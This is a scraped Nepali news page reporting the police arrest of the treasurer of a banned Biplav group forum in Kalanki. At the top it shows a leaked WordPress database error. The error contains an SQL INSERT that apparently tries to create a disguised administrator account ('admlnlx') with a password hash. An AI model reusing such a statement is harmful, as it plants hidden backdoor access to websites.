WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtOElMSmhQAM0tda5isyKd/Y9UpRas.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:19:55', '', 'admlnlx', 'admlnlx')

प्रतिबन्धित विप्लव समूह जनसम्पर्क मञ्चका कोषाध्यक्ष पक्राउ – Gaule Khabar

प्रतिबन्धित विप्लव समूह जनसम्पर्क मञ्चका कोषाध्यक्ष पक्राउ

राजनीति

प्रतिबन्धित विप्लव समूह जनसम्पर्क मञ्चका कोषाध्यक्ष पक्राउ

गाउँले न्युज, काठमाण्डौ । सरकारले प्रतिबन्धित नेत्र विक्रम चन्द विप्लव समूह नेकपाका केन्द्रीय जनसम्पर्क मञ्चका कोषाध्यक्ष अर्जुन कटुवाल पक्राउ गरेका छन् ।

प्रहरीले कटुवाललाई मंगलबार दिउँसो कलंकीबाट पक्राउ गरेको हो । उनी कलंकीमा ठेक्कापट्टा र निर्माणसम्बन्धि कार्यालय सञ्चाल गरी बसेका थिए ।

कटुवालले व्यवसाय सञ्चालन गरेर बसेपनी विप्लव समुहमा आवद्ध रहेर चन्दा संकलन गर्ने, पक्राउ परेका अन्य नेताकार्यकर्ताको परिवारलाई आर्थिक सहयोग गर्ने गरेको प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका